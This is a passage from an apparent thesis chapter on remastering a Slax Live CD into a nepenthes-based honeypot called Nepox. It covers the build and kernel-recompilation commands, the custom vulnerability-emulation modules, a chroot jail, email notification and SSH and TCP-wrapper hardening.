incident-related data without further, significant manual intervention. However, in case administrators have to reconfigure certain parts of the system, they should be able to log in locally or remotely over an encrypted network connection at any time. The core functionality of the Live CD as well as the co-operation with the central server is shown in Figure 4.5, the implementation of the individual software parts is illustrated in the next section. 51 4 Development of a Live CD-Based Honeypot Figure 4.5: Functionality of the Live CD-Based Honeypot 52 4 Development of a Live CD-Based Honeypot 4.3.3 Illustration of the Remastering Process of the Live CD 4.3.3.1 Preparing the System Environment In order to develop our own Live CD, we must make substantial modifications to the base modules that are provided with Slax (cmp. Table 4.6). For this reason, we need to copy the compressed modules to a persistent hard disk partition, uncompress the necessary files, make appropriate changes, and finally burn the new derivative of the distribution to CD. To create the persistent system environment, we use a so-called partition editor like fdisk or cfdisk. The partition editor helps divide a hard disk into smaller, more manageable sections of space (see Dalheimer and Welsh, 2005)13 . With regard to our project specifications, we add a partition with a size of 1.5 GB: About 800 MB have to be reserved for the decompressed modules, another 250 MB for the final image of our CD. The remaining space may be used for file manipulation operations. In order to store files on the the new partition, we need to build a valid Linux file system with the help of the mkfs command and mount it into the directory hierarchy of the operating system. Afterwards, we can recursively copy the CD to hard disk and extract the base modules using the lzm2dir utility which is part of the Slax Live CD. This process is illustrated in Line 1 to 18 of Listing 4.1 When all changes are completed, we compile an updated version of the module in question, compress it with the dir2lzm application (see Line 21) which is also provided by Slax, and finally overwrite the original instance of the CD. In the last step, we run the make_iso.sh script to generate a new, bootable image of the distribution that can be burned to CD as we have already indicated. The individual actions which are required to remaster the main parts of the Live CD are summarized in Figure 4.6. As we will see in the following section, we go through a similar process to build our own honeypot module. Figure 4.6: Overview about the Remastering Process 13 Note: This reference applies to all system commands and applications that are described in this section unless otherwise stated. 53 4 Development of a Live CD-Based Honeypot 1 2 # c r e a t e t h e f i l e s y s t e m f o r t h e p a r t i t i o n hda2 mkfs -t ext3 / dev / hda2 3 4 5 6 # c r e a t e a mount p o i n t f o r t h e p a r t i t i o n mkdir / mnt / hda2 mount - rw / dev / hda2 / mnt / hda2 7 8 9 # r e c u r s i v e l y c o p y t h e CD t o h a r d d i s k cp - rdpv / mnt / live / mnt / hdc / mnt / hda2 / CD 10 11 12 13 # c r e a t e a source d i r e c t o r y f o r th e modules mkdir / mnt / hda2 / sources cd / mnt / hda2 / sources ; mkdir 001 - core ; ...; mkdir 009 - devel 14 15 16 17 18 # d e c o m p r e s s t h e b a s e m o d u l e s o f t h e CD lzm2dir / mnt / hda2 / CD / slax / base /001 - core . lzm 001 - core / ... lzm2dir / mnt / hda2 / CD / slax / base /009 - devel . lzm 009 - devel / 19 20 21 22 23 24 # a f t e r a l l c h a n g e s h a v e b e e n made , c o m p r e s s t h e new module and # o v e r w r i t e t h e o r i g i n a l module w i t h t h e u p d a t e d v e r s i o n dir2lzm 001 - core / 001 - core . lzm ... dir2lzm 009 - devel / 001 - devel . lzm 25 26 cp *. lzm / mnt / hda2 / CD / slax / base 27 28 29 # c r e a t e an image o f t h e new L i v e CD / mnt / hda2 / CD / slax / make_iso . sh Listing 4.1: Preparation of the System Environment 4.3.3.2 Developing the Honeypot Module Our honeypot module is composed of three interdependent elements, namely the nepenthes low-interaction honeypot as the core component, the secured system environment, and a couple of scripts that are required for maintaining and configuring the decoy. Building the core honeypot files: By default, nepenthes consists of a significant number of vulnerability, shellcode parsing, fetch, submission, and logging modules. The interaction among these modules has already been described in Chapter 2, a thorough explanation can also be found in the paper by Bächer et al. (2006). However, it is important to stress that, particularly, many of the standard vulnerability modules are quite outdated. For example, the vuln-asn1 module emulates a buffer overrun flaw in a Mirosoft Windows system library which was published in 2004 (see Microsoft Corporation, 2004b). For this reason, it is questionable whether these types of vulnerabilities 54 4 Development of a Live CD-Based Honeypot are still capable of attracting common malware of today (cmp. Holz, 2008). That is why we supplement nepenthes with several additional modules that are developed and maintained at the University of Mannheim. They are able to simulate more recent security weaknesses and, thus, are likely to be targeted by newer and more modern variants of malicious software. An overview about the custom modules is given in Table 4.7. Type of Module Logging Modules Other Modules Vulnerability Modules Description Logs download and submit events log-download-privacy and supports the anonymization of local IP addresses. Queries a geographical database to find location-related informalog-geoip tion about an attacker. Sends submission-related events to a central server. Local IP adlog-surfnet-privacy dresses are sanitized for privacy purposes. Mirrors incoming malicious traffic module-mirror to simulate a vulnerable system. Acts as a proxy server for incommodule-proxy ing malicious traffic. Emulates an off-by-one remote buffer overflow vulnerability for vuln-apache2058 the Apache ModRewrite module. Emulates a buffer overflow vulnerability for the CA BrightStor vuln-arcserve ARCserve Backup. Emulates a remote buffer overflow vulnerability for the CA Brightvuln-arcservesql Stor ARCserve Backup Agent for SQL. Emulates a remote format string vulnerability for the Axigen eMail vuln-axigen2b Server 2.0.0b2. Emulates a remote injection vulvuln-brightstor11520 nerability for the CA BrightStor Backup 11.5.2.0 application. Emulates a remote buffer overflow vulnerability for the WFTPD and vuln-chimaeraftp FreeFTPD FTP server. Table continues on the following page. Name of Module 55 4 Development of a Live CD-Based Honeypot Type of Module Name of Module vuln-com3tftp vuln-imail2006 vuln-mailenable1x vuln-mailenable234 vuln-ms06040 vuln-ms06070 vuln-wftpd323 Description Emulates a remote buffer overflow vulnerability for the 3Com TFTP server. Emulates a remote buffer overflow vulnerability for the IpSwitch IMail 2006 and IMail 8.x mail server. Emulates a remote buffer overflow vulnerability for the MailEnable Enterprise 1.04 and MailEnable Professional 1.54 mail server. Emulates a remote buffer overflow vulnerability for the MailEnable Enterprise 2.34 mail server. Emulates a remote buffer overflow vulnerability for the Server service of Microsoft Windows. Emulates a remote buffer overflow vulnerability for the Workstation service of Microsoft Windows. Emulates a remote buffer overflow vulnerability for the WFTPD 3.23 FTP server. Table 4.7: Custom-Built Modules of the nepenthes Low-Interaction Honeypot To build the different elements of the honeypot, we have to use various helper tools that are part of the Gnu Configure and Build System (see Vaughan et al., 2000): The GNU autoconf14 utility creates a configuration script from a template file for a given source code package. The script probes the operating system the package will be installed on for numerous platform-specific features. For instance, it checks the availability of certain dependency libraries. By doing so, it is verified that all system requirements are correctly fulfilled. The default nepenthes source package is already distributed with such a configuration script and comprises the standard modules. Because our Live CD implements a custombuilt version of the honeypot, we must update this script though. Therefore, we edit the original template file, add the directory path of our own modules, and execute the autoreconf command to take the new definitions into account. We must also run GNU automake15 which, in co-operation with autoconf, generates a so-called global 14 15 see http://www.gnu.org/software/autoconf/ see http://www.gnu.org/software/automake/ 56 4 Development of a Live CD-Based Honeypot Makefile. This file is processed by the make command to compile the source code of the honeypot. By specifiying the DESTDIR parameter and the install argument, we can finally install the application to a pre-set location. A summary of these operations is shown in Figure 4.7. Figure 4.7: Illustration of the GNU Configure and Build System Preparing the secured environment: As we have outlined in Section 4.3.2, the honeypot is to be executed within an isolated, minimized environment, i.e., only a rudimentary set of functions and operations is being made available. For this reason, we need to supply nepenthes with all its dependencies, namely the libadns16 , libcap17 , libcurl18 , libmagic19 , libpcap20 , libpcre21 , and libprelude22 library. A brief description of these libraries is shown in Table 4.8. Their source code is prepared and compiled with the configure and make commands, analogously to the building process of the base honeypot. In the last step, we separate the program files from other parts of the operating system by invoking make install with the DESTDIR parameter as described above. 16 see see 18 see 19 see 20 see 21 see 22 see 17 http://www.chiark.greenend.org.uk/~ian/adns/ ftp://ftp.kernel.org/pub/linux/libs/security/linux-privs/kernel-2.6/ http://curl.haxx.se/ http://packages.debian.org/unstable/libdevel/libmagic-dev http://www.tcpdump.org/ http://www.pcre.org/ http://www.prelude-ids.com/en/development/download/ 57 4 Development of a Live CD-Based Honeypot Dependency Library Libadns Libcap Libcurl Libmagic Libpcap Libpcre Libprelude Description Libadns is an easy-to-use, asynchronous-capable DNS resolver that translates domain names into IP addresses. This library enables nepenthes to use the POSIX 1e capability support that is built into the Linux kernel (see Trümper, 1999). With so-called Access Control Lists (ACLs), it is possible to have fine-grained control over the privileges of a file. These libraries are used for downloading malicious files over HTTP and FTP. Libmagic determines the type of a file based on a magic number or a string that is found in the file. The Libpcap library offers a high level interface for capturing network packets. The Libpcre library is a set of functions for pattern matching with Perl-compatible regular expressions. Libprelude is a supportive library for the hybrid intrusion detection framework Prelude that enables different security applications to report to a central system. In order to use this function, nepenthes must be configured and compiled with the option --enable-prelude. Table 4.8: Dependency Libraries Required for the nepenthes Low-Interaction Honeypot Building the secured environment: When all operations are finished, we copy the generated package trees to a single directory. This directory serves as a foundation for the secured zone which can later be set up easily with the chroot command. By invoking chroot, a pseudo root directory is created (see Flenov, 2005). As a consequence, files that are stored in upper layers of the directory hierarchy cannot be accessed any longer, because the created environment appears to be the top node of a virtual file system (cmp. also Friedl, 2002; Burr, 2002). Thereby, applications that are executed with nonsuperuser privileges within the chrooted directory, are held captive in a tightly bound jail. To permit proper operations, the jail encloses the bash (Bourne-Again Shell) command interpreter as well as binaries to list the contents of files and directories, e.g., the cd and ls commands. These utilities, in turn, make use of additional software components, for example the general libc library which defines basic system calls and functions for the C programming language the executables are written in. The dependencies must be copied to the appropriate branches in the directory hierarchy. The ldd command is of great help to find the correct path of the auxiliary files. In the last step, we run ldconfig, an administrative tool for rebuilding the cache of the runtime linker. Thereby, all shared libraries can be found when a program is launched. 58 4 Development of a Live CD-Based Honeypot In order to successfully invoke the honeypot within our secured zone, we must make a number of further changes: First, we have to add the /tmp directory with global access permissions to permit temporary operations. Additionally, the /var/log directory must be created in order to enable logging activities. Second, we generate the world-readable passwd and group files in the etc directory of our jail. These files store authenticationrelated information about legitimate users and groups of the system and are required by nepenthes. A typical line in the passwd file is printed below. The entry defines the superuser account with a user and group identification number of 0, the home directory, and the command shell to be used. The x in the second column refers to a so-called shadow file which usually contains the encrypted system passwords. However, as we do not perform any login operations within the isolated environment, the shadow file is omitted for security reasons. root : x :0:0::/ root :/ bin / bash Third and last, we set up a device special file /dev/null with the mknod command. The file accepts arbitrary input flows but does not produce any corresponding output streams (cmp. Dalheimer and Welsh, 2005). As we will see later, this characteristic is extremely beneficial to discard unwanted error and notifying messages from our scripts. Once all modifications are completed, the jail has a structure as shown in Figure 4.8. It is similar to the original directory tree of the operating system even though the number of applications provided is significantly smaller. To start nepenthes within the secured environment, we execute the chroot command as follows: chroot . bin / bash -c [ path to nepenthes ] -u < user > -g < group > The decoy is then initialized with full access permissions by the bash command interpreter. This operation is necessary to permit emulating services that bind to the well-known ports (cmp. Internet Assigned Numbers Authority (IANA), 2008), i.e., ports with registered numbers less than 1024. An example of an emulated service that binds to a well known port is defined in the Apache module of nepenthes. The module simulates an HTTP server and listens on port 80. Services running on the registered and private ports (i.e., higher than 1024) may be executed with a non-privileged user account for security reasons. The username and corresponding group can be specified the -u and -g options. Developing the maintenance and configuration scripts: To facilitate the configuration of the honeypot, we develop a graphical interface that allows to enable or disable individual modules as well as edit specific program settings. All modifications are taken into effect when nepenthes is restarted. 59 4 Development of a Live CD-Based Honeypot Figure 4.8: Directory Structure of the Secured Live CD Environment The graphical interface is based on the dialog package23 which is maintained by Vincent Stemen. The dialog application is called from within a shell script. By specifiying different command line parameters, we are able to display various interactive elements such as message boxes, checklists, or text fields. Input and output operations are redirected to the system console. That is why, it is possible to perform administrative tasks locally as well as over a non-graphical, remote network connection. When our shell script is launched, a menu with different selection options is shown. The user may then, for instance, choose to view the list of activated vulnerability modules (see Figure 4.9(a)). This list and other program variables are stored in the main nepenthes configuration file. A module-related entry in the configuration file is divided into three sections and consists of the module name, the name of a module-specific dependency file, and another parameter which is usually left empty. For example, the configurational directive for the Sub7 trojan backdoor24 refers to the vulnsub7.so module and a dependent vuln-sub7.conf file. 23 24 see http://hightek.org/dialog/ see http://www.sub7legends.com/ 60 4 Development of a Live CD-Based Honeypot Since other modules are described in a similar fashion, we are able to define a regular expression which helps find standardized text patterns quickly(see Friedl, 2006, for a complete overview about regular expressions). Regular expressions are supported by many programming languages, e.g., awk 25 which is already included on the Slax Live CD and may thus be easily integrated into our distribution. With the help of a simple awk program, we extract the relevant text fractions from the main configuration file and temporarily save the results in memory. Other potential inter-process messages that are returned by the command shell are discarded through redirection to the device special file /dev/null as we have explained above. Thus, the execution of the awk script is completely transparent to the user. When the operation is finished, the temporarily stored data is read in, and the status of the different modules is displayed within a new dialog window. The user may then interactively enable or disable specific components of the honeypot. After all changes have been made, the list of selected modules is returned. The program settings are then updated with sed26 , a second helper utility which is capable of editing specific sections of a file (see Dougherty and Robbins, 1997). To deactivate a certain module, we write a basic sed instruction and simply insert two leading slashes (//) before the respective entry in the configuration file. As a consequence, the string is interpreted as a user comment and gets ignored when the file is parsed at the start of nepenthes. To reactivate a module, the comment characters are removed, and the original entry is restored. An extract of the corresponding shell script which illustrates the interaction with awk and sed is printed in Appendix A. Our graphical interface also permits modifying module-related program parameters of the honeypot. For this purpose, we list the individual configuration files in a separate file selection dialog (see Figure 4.9(b)). When a choice is made, the specific file is linked with an external editor, and the user has the possibility of manually updating the program options. For example, in order to change the Internet address of the central server malicious binaries will be sent to, the file submit-norman.conf is automatically opened. Building the entire honeypot module: The configuration script, the core honeypot package, and its dependencies are finally compressed with the dir2lzm command to create a new Live CD module as we have outlined in the previous section. The generated module is then copied to the base directory of the distribution so it is loaded at system startup. Afterwards, nepenthes can be launched over the default desktop manager and commence collecting data about threats and intrusions. For this purpose, we need to adapt the graphical user interface of the operating system. This process is explained in Section 4.3.3.7. Users are also to be automatically informed about honeypot-related events on a regular basis. For this reason, we also implement a notification system on the Live CD. The architecture of this system is subject of the next section. 25 26 see http://www.gnu.org/software/gawk/gawk.html and Dougherty and Robbins (cmp. 1997) see http://www.gnu.org/software/sed/ 61 4 Development of a Live CD-Based Honeypot (a) Module Selection Dialog for Activating/Deactivating the Vulnerability Modules (b) File Selection Dialog for Editing a Configuration File Figure 4.9: Honeypot Configuration Interface of the Live CD 4.3.3.3 Implementing the Notification System Once the nepenthes honeypot is started, it generates a significant amount of information about threats and malicious activities with the help of several logging modules (cmp. previous section). For instance, whenever a compromise is detected and a piece of malicious software is successfully captured, this event is written to a special file which is stored in the var/log folder of the application directory. However, when data is collected simultaneously on multiple machines, analyzing each device can be time consuming. For this reason, we set up an automated notification system in order to decrease the maintenance effort for system administrators and security professionals. Aggregated status reports for the individual decoys can then be received on a daily basis. The architecture of the notification system is based upon three components, namely the logrotate utility, the mailx program, and the Postfix server. These components are briefly described in the following. The logrotate utility27 by Erik Troan and Preston Brown is already included in the original Slax distribution and permits “rotation, compression, removal, and mailing of log files” (see Troan and Brown, 2002). Due to these features, we are able to automatically process messages that are generated by nepenthes within a given time interval. For this purpose, we define various directives in the main configuration file /etc/logrotate.conf. For example, to add a timestamp to each of the relevant log files, we specify the dateext directive (see also Ducea, 2006; Sharma, 2005). Additionally, we implement definitions to create a daily archive of all files. The archive is compressed in order to save space on the Live CD. 27 see https://fedorahosted.org/logrotate/wiki 62 4 Development of a Live CD-Based Honeypot Figure 4.10: Architecture of the Notification System on the Live CD In the next step, the compressed archive is passed to the mailx program. As the name suggests, mailx28 is a simple tool for sending and receiving mail. It is maintained by Gunnar Ritter. One of its major advantages is its capability to be either executed interactively or entirely through a script by specifying a number of command line arguments. Therefore, we are able to compose an automated message and inform users about honeypot-related incidents, while sending the archive with the nepenthes log files as an attachment. The actual delivery of the message is performed by a Postfix server29 which is implemented as an independent mail transfer agent (MTA) on the CD. In comparison to other MTAs such as Sendmail30 , Postfix is particularly reliable, robust, and secure while being easy to use (cmp. Dent, 2002). These characteristics make Postfix well-suited for a security-sensitive environment. A summary of the cooperation between the different components is illustrated in Figure 4.10. In the following sections, we explain the remastering and customization activities for other major components of the Live CD, including the boot loader and the system kernel. The chronological order of the description is in accordance with the boot sequence of the distribution that we have described in Section 4.3.1.1 (see also Figure 4.3). 4.3.3.4 Adapting the Boot Loader As we have already explained, the central task of a boot loader is to invoke the kernel of the operating system after the machine has been started. The Slax Live CD implements the Isolinux31 boot loader by H. Peter Anvin. It is open source, free of charge, and 28 see see 30 see 31 see 29 http://sourceforge.net/projects/nail/ http://www.postfix.org/ http://www.sendmail.org/ http://syslinux.zytor.com/iso.php 63 4 Development of a Live CD-Based Honeypot 1 2 3 4 5 LABEL xconf MENU LABEL Nepox Graphics mode ( KDE ) KERNEL / boot / vmlinuz APPEND vga =769 initrd =/ boot / initrd . gz ramdisk_size =6666 root =/ dev / ram0 rw passwd = ask autoexec = xconf ; kdm Listing 4.2: Sample Boot Label of the Isolinux Boot Loader fully compatible with the El Torito format specification which is required to launch the distribution from CD. For our purposes, Isolinux only needs to be slightly adapted. First, the package of the boot loader is saved to a directory in the boot folder of the Live CD. It contains an isolinux.cfg configuration file which is processed at system startup. The configuration file includes a number of boot labels the user may select from. A boot label typically comprises the path to the kernel as well as additional boot options that are passed to the core services for further initializing operations. Due to those options, multiple system profiles may be created. For instance, it is possible to specify different video modes in order to support machines with limited screen resolution capabilities. A sample label is shown in Listing 4.2. As can be seen in Line 4, the different boot options are defined in a separate APPEND section. One of the most important options is initrd. It determines the location and size of the initial ram disk which is responsible for storing several key applications as we have briefly described in Section 4.3.1.1. With the help of the passwd parameter the user may be prompted to change the default password when the operating system is loaded. We include this parameter for security purposes, because users are free to login remotely over the Internet for maintenance reasons. A description of the remaining boot options as well as all other valid boot declarations can be found in Appendix B. 4.3.3.5 Compiling the System Kernel The name and boot picture of the original Slax distribution is deeply rooted in the core of the operating system. To replace the existing information and display our own logo at startup, we need to recompile the system kernel. This operation, however, cannot be directly performed from within the Live CD, because only a reduced set of the necessary source files are provided in order to save disk space. For this reason, recompilation must be invoked on a full-featured operating system. We recommend to install Slackware, as it is the parent distribution of Slax (cmp. Section 4.1). We must then obtain the kernel files and the archives of the SquashFS and aufs file systems. As we have described in Section 4.3.1.2, SquashFS and aufs are used to store data in a compressed format as well as permit write operations during runtime. They are required to build a proper Live CD and must therefore be integrated into the kernel. The author of Slax maintains a web server where all required packages may be down- 64 4 Development of a Live CD-Based Honeypot # create a valid logo f i l e pngtopam logo . png | pnmquant 223 | pnmtopnm - plain > logo_linux_ \ clut224 . ppm # copy t h e l o g o to t h e d i r e c t o r y o f t h e k e r n e l s o u r c e s cp l og o_ li nu x_ cl ut 22 4 . ppm / usr / src / linux - ‘ uname -r ‘/ drivers / video / logo / Listing 4.3: Creating a Kernel Logo for the Live CD loaded32 . These packages must be extracted to the /usr/src/ directory where the core sources of the operating system are stored in. To build a new, adapted version of the kernel for our Live CD, the following steps have to be carried out (cmp. Kroah-Hartman, 2006): First, a valid kernel configuration file must be created, either from scratch, from a default configuration file, or taken from a distribution release. The configuration file contains instructions on whether specific drivers or other architectural objects are excluded entirely from the compilation process, directly compiled in the core, or provided as loadable kernel modules (LKMs). A loadable kernel module can be dynamically attached or detached during runtime without needing to reboot the system. This characteristic is a major advantage, because it offers a great deal of flexibility and enables to quickly modify the current hardware profile. Furthermore, a module is completely unloaded from memory and does not occupy space any longer when asked to detach, in contrast to elements of the base kernel that must always reside in memory even when idle. That is why it is generally proposed to build kernel components modularly where feasible and keep the size of the core system as small as possible (see Henderson, 2006). A complete list with the individual compilation decisions is also available on the web server of the Slax distributor. This list forms a good basis for our own kernel definitions. To create the final configuration file, the list must be renamed to .config and copied to the directory of the core sources. Afterwards, we simply run the oldconfig and make prepare command to initialize the recompilation process. In the second step, we integrate our own custom boot logo into the kernel. It is composed of a picture of the nepenthes carnivorous plant as well as the name that we have chosen for our Live CD, Nepox, an acronym for nepenthes out of the box. The input source for the logo can be any graphical format, but it must be converted to a so-called portable pixel map (PPM) with less than 224 colors (cmp. logo linux.h as defined by the Linux Kernel Organization, 2008). Conversion can be easily done with netpbm33 , an image manipulation toolkit by Bryan Henderson which is open source and free of charge. In Listing 4.3, sample commands for creating a logo from a PNG (portable graphics network) file are shown. After specifying the boot picture for our Live CD, we are able to compile the loadable kernel modules and the core components with the make command as illustrated in 32 33 see ftp://ftp.slax.org/source/slax/kernel/ see http://netpbm.sourceforge.net/ 65 4 Development of a Live CD-Based Honeypot # c r e a t e a t e m p o r a r y d i r e c t o r y f o r t h e new k e r n e l KERNEL =/ tmp / ‘ uname -r ‘ mkdir -p $KERNEL # change to the d i r e c t o r y of the k e r n e l sou rce s cd / usr / src / linux - ‘ uname -r ‘/ # c o m p i l e and i n s t a l l t h e l o a d a b l e k e r n e l m o d u l e s i n t h e d i r e c t o r y # of the system k e r n e l make -j 4 modules INSTALL_MOD_PATH = $KERNEL make modules_install # c r e a t e a c o m p r e s s e d k e r n e l image make -j 4 bzImage # s a v e t h e k e r n e l c o n f i g u r a t i o n and t h e k e r n e l image t o t h e # d i r e c t o r y o f t h e new k e r n e l mkdir -p $KERNEL / boot cp . config $KERNEL / boot cp arch / i386 / boot / bzImage $KERNEL / boot / vmlinuz Listing 4.4: Compiling the Kernel for the Live CD Listing 4.4. The file system modules for SquashFS and aufs are not part of the kernel configuration and must therefore be built separately (see also Lougher and Okajima, 2008). In the next step, we need to transfer all created files to our distribution. However, even though all dependencies are now included in the Live CD, the system is not functional yet. We still have to update the initial ram disk which is run at system startup and integrates support for the basic file systems as well as the core drivers. Performing this operation manually is error-prone because many files must be copied individually (cmp. Jones, 2006b). For this reason, the author of Slax has published a free collection of scripts, the so-called Linux Live scripts, to facilitate this process (see Matejicek, 2008b). The script generates a valid ram disk which must be saved to the boot directory of the CD. Afterwards, we only have to mount the disk temporarily and edit the linuxrc start file to adapt the system messages to our needs. Mounting requires use of a so-called loopback file interface. With the help of this interface, we are able to access the file system within the ram disk as a regular file. When all changes are made, the disk can be unmouted and compressed again as described in Listing 4.5. At last, we run the make_iso.sh command to build an image of the distribution with the new kernel and system components. A summary of the entire recompilation process is given in Figure 4.11. The development of the Live CD core is now completed. In the remaining sections, we illustrate customization operations to enhance the security and user friendliness of the CD. 66 4 Development of a Live CD-Based Honeypot # c r e a t e a temporary d i r e c t o r y f o r the mkdir ramdisk i n i t i a l ram d i s k # c o p y and u n c o m p r e s s t h e i n i t i a l ram d i s k cp / boot / initrd . gz . && gunzip initrd . gz # mount t h e i n i t i a l ram d i s k t o t h e l o o p b a c k mount -t ext2 -o loop initrd ramdisk / # adapt the l i n u x r c s t a r t ... file interface file # u p d a t e and c o m p r e s s t h e i n i t i a l ram d i s k umount ramdisk / && gzip -9 initrd Listing 4.5: Mounting the Initial Ram to Adapt the linuxrc Start File Figure 4.11: Overview about the Recompilation Process of the Kernel 67 4 Development of a Live CD-Based Honeypot 4.3.3.6 Hardening the System Environment One of the major challenges of the Live CD is to ensure the safety and integrity of the underlying operating system. This means, while it must be possible to compromise the emulated services of the honeypot, all other resources must be protected against attacks at all times. Preventing illegitimate access, data modification, or deletion requires a process which is known as system hardening. It involves measures on the network as well as on the physical layer (cmp. Turnbull, 2005). In this section, however, we only cover networkrelated aspects. For more information on securing the physical level, please refer to the draft by the National Institute of Standards and Technology (1996). Our system protection scheme is twofold: First, we shutdown all programs that are not vitally important at startup in order to minimize the number of potential entry points and vulnerabilities. As our Live CD is supposed to work as a single, independent data collection device, this includes network sharing and network connection applications. Second, we propose improving the authentication procedure for the SSH remote administration server and use so-called wrappers to limit access solely to certain IP addresses and ranges. Reducing the number of started services: Generally, services on the Live CD are started by initialization scripts that are stored in the etc/rc.d/ directory. As we have briefly explained in Section 4.3.1.1, these scripts are invoked by an init master process when the computer boots up and depend on a specific run level (see also Brockmeier, 2001). A run level determines the state the system is in, the provided functionality, and the mode of operation. At any given time, the state of the machine reflects one of the levels listed in Table 4.9. To disable a service, it is sufficient to revoke the execution permissions from its initialization script. Thereby, the application is not loaded when the operating system is launched and does not get bound to a network port. For example, to prevent the Unix Common Printing System (CUPS) from being executed at boot time, we change the Run Level 0 1 2 3 4 5 6 Description System halt Single user mode Not defined Multiuser mode with networking enabled and console login Multiuser mode with networking enabled and graphical desktop manager Not defined System reboot Table 4.9: Overview about the Run Levels of the Operating System (Source: Based on Brockmeier, 2001) 68 4 Development of a Live CD-Based Honeypot access rights of the initialization script with the chmod command and the parameter -x as follows: chmod -x / etc / rc . d / rc . cups Further candidates for removal may be identified with netstat, a utility for displaying all running network applications. It is already part of the original Slax distribution. Repeating the chmod command for the initialization scripts of the services in question, we sequentially exclude all unneeded programs except the Postfix and SSH server from the boot sequence. Thus, we effectively reduce the attack surface of our Live CD to two system components. Improving the authentication mechanism for the SSH server: Even though the SSH server strongly facilitates remote maintenance of the distribution, the password-based login mechanism of the service still forms a possible weak spot. For instance, by generating a large dictionary of common words, names, and phrases, an attacker may be able to successfully guess the authentication credentials, login, and compromise the system. For this reason, we suggest not to rely only on the strength of the chosen password but also verify the identify of the user with an additional security token. The security token can be implemented as a combination of private and public keys. The public key can be freely distributed and is stored in a special directory on the CD. The corresponding private key is protected with a password and strictly remains with the user. To login, the correct password must be entered, and the location of the private key must be specified. Thus, the authentication process is based on two factors, and access is granted if, and only if both these factors are fulfilled. In turn, if an intruder does not possess the private key or does not know the matching password, authentication fails, and access is rejected. An illustration of this process is shown in Figure 4.12, a more thorough explanation is given by Schneier (1996). To generate a valid key pair, we simply run the ssh-keygen command. The created public key must then be copied to the authorized_keys file in the .ssh/ directory of the system user. The private key must be transferred to a trusted machine and has to be kept in secret. In the last step, we update the configuration file /etc/ssh/sshd_config of the SSH service to accept public key identification requests and reject password-only logins (cmp. Mates, 2008). After restarting the server, the two-factor authentication functionality is enabled. 69 4 Development of a Live CD-Based Honeypot Figure 4.12: Two-Factor Authentication Process of the SSH Remote Administration Service Using TCP wrappers for access control: In order to impede illegitimate access to our CD, we can also make use of the TCP wrapper support the SSH remote maintenance application is compiled with. A TCP wrapper is a host-based network filter for system services (see Venema, 1992). In dependence of a simple access control list (ACL), communication requests with a service are either accepted or denied. The access control list is defined by two files, hosts.allow and hosts.deny, that are stored in the main configuration directory of the distribution. For security purposes, we recommend creating access rules according to a whitelist, i.e., we only permit connections from specific machines while rejecting traffic from all others. A sample configuration for hosts within the subnet 192.168.1.0/24 is illustrated in Listing 4.6. As can be seen, wrappers, in cooperation with two-factor authentication, may thus add another layer of protection against attacks. / etc / hosts . allow : # a c c e p t c o n n e c t i o n s from t h e s u b n e t 1 9 2 . 1 6 8 . 1 . 0 / 2 4 sshd : 1 9 2 . 1 6 8 . 1 . 0 / 2 5 5 . 2 5 5 . 2 5 5 . 0 / etc / hosts . deny : # r e j e c t r e q u e s t s from a l l o t h e r m a c h i n e s sshd : ALL Listing 4.6: Example of a TCP Wrapper Configuration 70 4 Development of a Live CD-Based Honeypot 4.3.3.7 Customizing the Graphical User Interface We have already pointed out that the usability and user friendliness of our Live CD are important criteria for system administrators and security professionals in order to carry out maintenance tasks quickly and focus on data collection and data analysis activities. For this reason, all honeypot and system functions are to be configured and executed within a graphical user interface. The original Slax distribution implements the K Desktop Environment (KDE) which is both reliable and stable. However, in its default configuration, KDE offers many functions that are not strictly required for our needs, for instance, multimedia playing capabilities. Consequently, we have to customize the existing environment and remove all dispensable components to make the user interface as intuitive as possible. Furthermore, we change many visual elements and system settings to create a unique and distinguishable look of our Live CD. For example, we add desktop icons and submenu entries to permit easy access to the honeypot module. We also adapt the desktop wallpaper, the appearance of the login and logoff screen, and the system color palette. As these operations involve modifying a large number of files and options, a complete and detailed presentation of all changes would not be beneficial. Thus, we rather describe the architecture of the KDE platform from a more abstract point of view for a better understanding. The desktop environment as a whole consists of several individual applications that are split into software packages (see also Hall, 2005). For instance, the KDE base package comprises all core components such as the default window and file manager, a terminal emulator to provide access to the command shell, and a control center for administrative purposes. Each program also requires multiple system libraries that are part of the kdelibs package. Both these packages are included on the Live CD. Further optional features such as personal information management tools are, as we have already mentioned above, not strictly needed for our purposes and may thus be omitted to reduce complexity and keep the size of the distribution as small as possible. The different KDE applications are tightly interconnected and work collaboratively as it is indicated in Figure 4.13. One of the most important parts of the environment is the login manager kdm which is mainly responsible for user authentication. It is the first program to be launched in the KDE startup hierarchy. Kdm displays a graphical login screen and prompts users to enter their credentials. The appearance of this screen can be customized by editing the kdmrc configuration file which is stored in the /usr/share/config/kdm directory of the Live CD. Thereby, it is, for instance, possible to show a short greeting message or a custom logo when logging in. An explanation of the corresponding configuration directives is given by Buddenhagen (2007). When a valid username and password are entered, a new desktop session is prepared. For this purpose, a special startup script is invoked and a so-called master process gets executed. Similar to the init process of the operating system (cmp. Section 4.3.1.1), this master process acts as a parent for a number of further services that are started in 71 4 Development of a Live CD-Based Honeypot Figure 4.13: Components of the KDE Platform the background, e.g., kcminit which supports different profiles and user-specific settings for hardware devices. The default configuration of these components is suitable for our distribution and does not need to be altered. In the last step, the ksmserver session manager is loaded. It sets up the desktop as well as the control panel, restores the state of previously run programs, and processes scripts that are stored in a predefined autostart folder. Since these activities greatly affect the visual design of KDE, applications that are started by the ksmserver are of particular relevance to the customization of the user interface. In the following, we illustrate the general customization procedure based on the central elements of the user environment: The KDE desktop and the control panel provide a comfortable way to open programs quickly, either by clicking on a desktop icon or by selecting an item in the system menu which is part of the control panel at the bottom of the screen. To adapt the appearance and behavior of these components, we can use the kcontrol and kmenuedit utilities that are integrated in KDE. Additionally, several built-in functions of the interface are of great help. For example, we are able to add, change, or remove desktop icons easily by choosing the respective command from a context menu. It is important to stress though that these modifications always apply to the current user only. Thus, the user-specific settings have to be transferred to the system level in order to implement the changes on a global scope. For this purpose, we must manually copy the individual configuration files to the designated folders in the directory hierarchy. The specific user and system-wide directories that are relevant for this process are summarized in Table 4.10 (see also Bastian, 2004). Although these operations are cumbersome, they must be carried out with great care 72 4 Development of a Live CD-Based Honeypot Directory /usr/bin /usr/lib /usr/share/services /usr/share/applications /usr/share/config /usr/share/icons, /usr/share/sounds, /usr/share/wallpapers ~/.kde, ~/.local Description Stores the KDE executables, including the startup script and the KDM binary. Stores the libraries that are required for the desktop environment. Includes configurational settings for internal system services such as text or picture rendering engines. Contains definition files for the desktop icons. Contains files with system-wide configurational directives. The file kdeglobals is processed by all KDE applications. Stores multimedia-related files that can be used by any 